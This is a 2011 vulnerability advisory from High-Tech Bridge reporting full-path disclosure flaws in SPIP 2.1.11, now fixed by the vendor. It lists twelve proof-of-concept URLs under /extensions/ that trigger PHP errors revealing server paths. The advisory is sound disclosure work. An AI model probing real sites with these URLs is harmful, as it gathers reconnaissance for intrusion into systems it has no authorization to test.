[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Path disclosure in SPIP



Vulnerability ID: HTB23052
Reference: https://www.htbridge.ch/advisory/path_disclosure_in_spip.html
Product: SPIP
Vendor: www.spip.net ( http://www.spip.net ) 
Vulnerable Version: 2.1.11  and probably prior
Tested Version: 2.1.11 
Vendor Notification: 05 October 2011 
Vulnerability Type: Path disclosure
Status: Fixed by Vendor
Risk level: Low 
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered path multiple path disclosure vulnerabilities in SPIP.

The vulnerabilities exist due to improper error handling in multiple PHP scripts located in /extensions/ folder. It is possible to generate a PHP error that will reveal the full path of the vulnerable script. 

The following PoC code is available:

http://[host]/extensions/filtres_images/filtres/couleurs.php
http://[host]/extensions/filtres_images/filtres/images_lib.php
http://[host]/extensions/filtres_images/filtres/images_transforme.php
http://[host]/extensions/filtres_images/filtres/images_typo.php
http://[host]/extensions/filtres_images/inc/filtres_images.php
http://[host]/extensions/filtres_images/tests/couleur_extraire.php
http://[host]/extensions/filtres_images/tests/multiple_de_trois.php
http://[host]/extensions/filtres_images/tests/_couleur_hsl2rgb.php
http://[host]/extensions/filtres_images/tests/_couleur_hsv2rgb.php
http://[host]/extensions/filtres_images/tests/_couleur_rgb2hsl.php
http://[host]/extensions/filtres_images/tests/_couleur_rgb2hsv.php
http://[host]/extensions/porte_plume/inc/barre_outils.php

Successful exploitation of the vulnerabilities requires that "display_errors" is enabled.
Solution: Upgrade to the most recent version
Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.